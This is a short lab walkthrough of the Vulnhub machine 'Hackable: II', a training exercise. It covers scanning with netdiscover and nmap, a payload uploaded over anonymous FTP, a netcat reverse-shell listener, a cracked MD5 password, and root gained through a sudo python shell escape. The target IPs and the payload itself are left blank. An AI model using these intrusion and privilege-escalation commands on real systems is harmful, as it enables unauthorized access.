HACKABLE: II -: (Vulnhub) Walkthrough

Pulkit Marele
Armour Infosec
Published in
3 min readAug 3, 2021


I personally enjoyed playing with this box, this box taught me how to stay focused while doing enumeration and exploitation. There’s so much going on with this box for post exploitation. let’s pwn it ..!!!

Here is the link to downlaod this VM:-


Network Scanning

We always start with network scanning, Let’s find the target IP address by running netdiscover.

└──╼ #netdiscover -i wlan0

As we saw in netdiscover result. Our target ip address is


Our next step is scanning the target machine. let’s start with nmap.

└──╼ #nmap -v -sT -p- -sV -A -O

We have an FTP server that has allowed anonymous access and try to upload a payload.

└──╼ #ftp

└──╼ #nc -nlvp 443

$ id

$ cd /home

$ ls

$ cat important.txt

now i got hash


hash=cf4c2232354952690368f1b3dfdfb24d = onion

└──╼ #ssh shrek@

shrek@ubuntu:~$ ls

shrek@ubuntu:~$ cat user.txt

Privilege Escalation

shrek@ubuntu:~$ sudo -l

shrek@ubuntu:~$ sudo python3.5 -c ‘import os; os.system(“/bin/sh”)’
# id
# cd /root
# ls
# cat root.txt

Successfully got the root privilege and the ‘root.txt’ .

